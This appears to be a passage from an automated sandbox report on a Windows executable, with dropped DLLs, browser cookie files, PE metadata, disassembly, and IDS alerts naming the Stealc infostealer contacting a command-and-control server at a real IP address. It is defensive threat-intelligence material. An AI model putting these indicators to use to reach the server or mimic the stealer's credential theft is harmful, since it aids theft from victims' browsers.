Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\q27UFusYdn.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465416135536367
Encrypted:	false
SSDEEP:	6144:cIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNDdwBCswSb8:hXD94+WlLZMM6YFHZ+8
MD5:	37EA5BFF535335C0C7ED6CEFD0962E57
SHA1:	1060F87F1CCF2135CBE0A610BB643D1B3C499E1D
SHA-256:	307D481FE53B33C83D1C6443C4C5A9C04D0EF56A5782F4B8EB8836F2336529B5
SHA-512:	1F60B1DD01D36B535BDFCD3C7E5DD98ECD6D6629F278F90BA4AAB382FEA858B7E2147F8E9AFE397CBA630C8FDDFA97C72C6A98C4A1AEDAAE37AE9DDF85C769DE
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.: .O...............................................................................................................................................................................................................................................................................................................................................c56.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.453890288533172
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	q27UFusYdn.exe
File size:	336'384 bytes
MD5:	bb88997d394c01230d90aa731f4e8837
SHA1:	bfce6a6839d2fa159691eaf7ed884e93b481ed35
SHA256:	c1d0339f73af46c63b7ab866c65a1cdc636cfdb12492587cee7bb92486a917f0
SHA512:	56cc6440ef3aec61558a7a5797937ad9a6da7d9d9eced096a64b88c8821119425d94f498c4c579b724f0b4c965a0d6e887f4c8fca81909d776f667765e0267a9
SSDEEP:	3072:oj28kZpEZkkxwybSM+QF5XWdyFmnM8A+9VZNqxybPgr2E9vmsyH1IgYJgtKT4i9+:6kZ6/I0fT+XZNqx9yEksGhQECc
TLSH:	49649E03F2F0AC60F36346329F68B694669FFC515E25572B2E44660F66703F0E2A275E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.lFA.lFA.lFL..FY.lFL..F9.lFL..Fm.lFH..FF.lFA.mF/.lF.y.F@.lFL..F@.lF.y.F@.lFRichA.lF................PE..L......c...........

File Icon


Icon Hash:	43214545514d510d

Static PE Info

General

Entrypoint:	0x403945
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x63D6150D [Sun Jan 29 06:41:17 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	c9619f19f41ef1b7d232f47cfbcc330b

Entrypoint Preview

Instruction
call 00007F923890D242h
jmp 00007F92389091C5h
push 00000014h
push 00414DD8h
call 00007F9238909DEAh
call 00007F923890B95Bh
movzx esi, ax
push 00000002h
call 00007F923890D1D5h
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F92389091C6h
xor ebx, ebx
jmp 00007F92389091F5h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F92389091ADh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F923890919Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F92389091CBh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F9238909C6Ch
test eax, eax
jne 00007F92389091CAh
push 0000001Ch
call 00007F92389092A1h
pop ecx
call 00007F923890CDD3h
test eax, eax
jne 00007F92389091CAh
push 00000010h
call 00007F9238909290h
pop ecx
call 00007F923890B6A4h
and dword ptr [ebp-04h], 00000000h
call 00007F923890AFA4h
test eax, eax
jns 00007F92389091CAh
push 0000001Bh
call 00007F9238909276h
pop ecx
call dword ptr [0040F0C4h]
mov dword ptr [04022688h], eax
call 00007F923890D229h
mov dword ptr [00431640h], eax
call 00007F923890CE26h
test eax, eax
jns 00007F92389091CAh

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[IMP] VS2008 SP1 build 30729
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x151ec	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c23000	0x21dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xf1f0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x14798	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xf000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xdde3	0xde00	c91bcca41f48e8ddfa04ef6f22059bcd	False	0.6056447072072072	data	6.71874280572877	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xf000	0x6b10	0x6c00	5c53c1539cd6af7d45fb708ca832ea7e	False	0.3941333912037037	data	4.807280064656727	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x16000	0x3c0c6a0	0x1b600	46da1275100e1df9455081b031935a84	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c23000	0x21dd0	0x21e00	eee482da7c4a1cc52ab731c3a7ea03c8	False	0.47950299815498154	data	5.542208980573668	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3c239d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.48587420042643925
RT_ICON	0x3c24878	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.5974729241877257
RT_ICON	0x3c25120	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.6463133640552995
RT_ICON	0x3c257e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.634393063583815
RT_ICON	0x3c25d50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Romanian	Romania	0.39097510373443983
RT_ICON	0x3c282f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Romanian	Romania	0.5079737335834896
RT_ICON	0x3c293a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Romanian	Romania	0.5848360655737705
RT_ICON	0x3c29d28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Romanian	Romania	0.675531914893617
RT_ICON	0x3c2a208	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.564498933901919
RT_ICON	0x3c2b0b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5505415162454874
RT_ICON	0x3c2b958	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.6163294797687862
RT_ICON	0x3c2bec0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4620331950207469
RT_ICON	0x3c2e468	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4880393996247655
RT_ICON	0x3c2f510	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.4954918032786885
RT_ICON	0x3c2fe98	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.44680851063829785
RT_ICON	0x3c30368	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.4163113006396588
RT_ICON	0x3c31210	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.4657039711191336
RT_ICON	0x3c31ab8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.5697004608294931
RT_ICON	0x3c32180	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.4624277456647399
RT_ICON	0x3c326e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4640041493775934
RT_ICON	0x3c34c90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.4831144465290807
RT_ICON	0x3c35d38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.5004098360655738
RT_ICON	0x3c366c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.5567375886524822
RT_ICON	0x3c36ba0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.4928038379530917
RT_ICON	0x3c37a48	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.4648014440433213
RT_ICON	0x3c382f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.44508670520231214
RT_ICON	0x3c38858	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.27645228215767637
RT_ICON	0x3c3ae00	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.28728893058161353
RT_ICON	0x3c3bea8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.30655737704918035
RT_ICON	0x3c3c830	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.3351063829787234
RT_ICON	0x3c3cd00	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.39019189765458423
RT_ICON	0x3c3dba8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.5703971119133574
RT_ICON	0x3c3e450	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.5910138248847926
RT_ICON	0x3c3eb18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.5274566473988439
RT_ICON	0x3c3f080	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Romanian	Romania	0.5145228215767634
RT_ICON	0x3c41628	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Romanian	Romania	0.5841932457786116
RT_ICON	0x3c426d0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Romanian	Romania	0.5762295081967214
RT_ICON	0x3c43058	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Romanian	Romania	0.6374113475177305
RT_STRING	0x3c43720	0x3ec	data	Romanian	Romania	0.4601593625498008
RT_STRING	0x3c43b10	0x4b6	data	Romanian	Romania	0.44859038142620233
RT_STRING	0x3c43fc8	0x18e	data	Romanian	Romania	0.5175879396984925
RT_STRING	0x3c44158	0x4a2	data	Romanian	Romania	0.43844856661045534
RT_STRING	0x3c44600	0x59c	data	Romanian	Romania	0.4449860724233983
RT_STRING	0x3c44ba0	0x230	data	Romanian	Romania	0.49107142857142855
RT_GROUP_ICON	0x3c30300	0x68	data	Romanian	Romania	0.7115384615384616
RT_GROUP_ICON	0x3c2a190	0x76	data	Romanian	Romania	0.6610169491525424
RT_GROUP_ICON	0x3c36b28	0x76	data	Romanian	Romania	0.6694915254237288
RT_GROUP_ICON	0x3c434c0	0x76	data	Romanian	Romania	0.6694915254237288
RT_GROUP_ICON	0x3c3cc98	0x68	data	Romanian	Romania	0.7211538461538461
RT_VERSION	0x3c43538	0x1e4	data			0.5371900826446281

Imports

DLL	Import
KERNEL32.dll	LocalCompact, GetUserDefaultLCID, AddConsoleAliasW, CreateHardLinkA, GetTickCount, EnumTimeFormatsW, GetUserDefaultLangID, FindResourceExA, GetVolumeInformationA, GetLocaleInfoW, GetCompressedFileSizeA, MultiByteToWideChar, GetTempPathW, SetThreadLocale, ChangeTimerQueueTimer, SetLastError, GetProcAddress, FindFirstChangeNotificationW, BuildCommDCBW, LoadLibraryA, WriteConsoleA, InterlockedExchangeAdd, LocalAlloc, SetCalendarInfoW, GetExitCodeThread, RemoveDirectoryW, AddAtomA, SetNamedPipeHandleState, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, LoadLibraryExA, ReadConsoleInputW, GetWindowsDirectoryW, AddConsoleAliasA, SetFileAttributesA, GetComputerNameA, WriteConsoleW, GetStringTypeW, GetLastError, HeapFree, EncodePointer, DecodePointer, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, GetCommandLineA, RaiseException, RtlUnwind, IsProcessorFeaturePresent, IsDebuggerPresent, HeapAlloc, GetProcessHeap, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, WriteFile, GetModuleFileNameW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, OutputDebugStringW, CreateFileW
ADVAPI32.dll	DeregisterEventSource
WINHTTP.dll	WinHttpConnect

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/23/24-09:26:55.902558	TCP	2051828	ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1	80	49730	185.172.128.111	192.168.2.4
04/23/24-09:26:54.922166	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49730	80	192.168.2.4	185.172.128.111
04/23/24-09:26:55.903821	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49730	80	192.168.2.4	185.172.128.111
04/23/24-09:26:55.589664	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49730	80	192.168.2.4	185.172.128.111
04/23/24-09:26:56.219444	TCP	2051831	ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	80	49730	185.172.128.111	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 09:26:54.715892076 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:54.921818972 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:54.922070980 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:54.922166109 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:55.127851963 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:55.588224888 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:55.588484049 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:55.589663982 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:55.795334101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:55.902558088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:55.902579069 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:55.902678967 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:55.903820992 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:56.109477997 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.219444036 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.219472885 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.219482899 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.219492912 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.219505072 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.219760895 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:56.240521908 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:56.240523100 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:56.446211100 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.446235895 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.446249962 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.822256088 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:56.822356939 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.077724934 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.283569098 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.389849901 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.389892101 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.389929056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.389966965 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390069962 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390070915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390070915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390070915 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390115976 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390177011 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390223980 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390281916 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390315056 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390414953 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390415907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390415907 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390450001 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390486956 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.390512943 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.390779972 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.595901966 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.595951080 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.595987082 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596021891 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596057892 CEST	80	49730	185.172.128.111	192.168.2.4
Apr 23, 2024 09:26:57.596088886 CEST	49730	80	192.168.2.4	185.172.128.111
Apr 23, 2024 09:26:57.596093893 CEST	80	49730	185.172.128.111	192.168.2.4
